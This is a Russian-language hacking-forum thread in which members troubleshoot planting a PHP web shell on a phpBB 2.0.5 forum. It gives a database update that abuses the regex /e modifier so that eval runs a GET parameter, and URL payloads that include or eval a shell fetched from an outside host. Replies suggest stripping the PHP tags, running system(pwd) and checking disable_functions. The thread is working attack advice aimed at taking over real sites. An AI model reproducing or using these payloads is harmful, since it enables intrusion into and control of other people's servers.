Форумы Заливка шелла в phpbb 2.0.5

Discussion in 'Уязвимости CMS/форумов' started by good.god, 8 Apr 2014.

  1. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Вечер добрый, не получается залить шелл в phpbb 2.0.5.
    Пытаюсь залить через восстановление БД:
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
    .
    И пхпинфо прекрасно отображается так:
    forum/profile.php?mode=editprofile&e=phpinfo();
    А вот когда таким путем пытаюсь залить сам шелл:
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include("http://site.ru/shell.php")' WHERE user_id=2;
    .

    Получаю лишь белую, пустую страницу:(
    Прошу Вашей помощи:)
     
  2. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Ах да, изначально косякнул в том, что залил шелл туда где пхп исполняется. Сейчас вроде нашел что-то адекватное, но не до конца уверен. Так что буду рад еще совету куда можно загрузить сам шелл, что в последствии уже без проблем загружать на нужный сайт.
     
  3. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    62
    Likes Received:
    23
    Reputations:
    5
    если allow_url_fopen on
    используй file_get_contents();
     
  4. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Да, allow_url_fopen - on
    Попробовал через file_get_contents();
    Такая конструкция
    Code:
    forum/profile.php?mode=editprofile&e=eval(file_get_contents(http://site/1.txt));
    Возвращаюсь в профайл админа, и никаких результатов:(.
     
  5. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    62
    Likes Received:
    23
    Reputations:
    5
    Надо вот так:
    forum/profile.php?
    mode=editprofile&e=file_get_contents(http://site/1.txt);

    а 1.txt должен быть шелом но без тегов: <?, <?php, ?>
     
  6. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Да, и так попробовал. Все верно, теги удалил:).
    Результат тот же. Реагирует ровно также когда ошибаюсь с синтаксисом. Т.е. ровно ничего не происходит. Работает только команда phpinfo().
     
    #6 good.god, 8 Apr 2014
    Last edited: 8 Apr 2014
  7. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    62
    Likes Received:
    23
    Reputations:
    5
    пиздец, если у тебя работает phpinfo() Будет работать всё, впиши system(pwd); а дальше отсюда и пляши
     
  8. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Хе, и system(pwd) также не работает:)
     
  9. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    315
    Likes Received:
    33
    Reputations:
    0
    Вообщем в чем дело понять не могу. Перепробовал уже все, и copy и include, и кавычки с пробелами через ASCII убирал. В пхп не силен вообще, использовал команды которые найти смог по данной теме.
    В итоге результат один, никаких ошибок, просто отображается нормальный профиль админа без изменений. Срабатывает пхпинфо. И все. Что за.
     
  10. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Так а, это, вероятность отключенных функций проверялась? Мне самому такое еще не попадалось, но оно дб прописано в php.ini, "disable_functions".
     
  11. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    62
    Likes Received:
    23
    Reputations:
    5
    disable_functions можно посмотреть и через phpinfo которое у него открывается :)
     
Loading...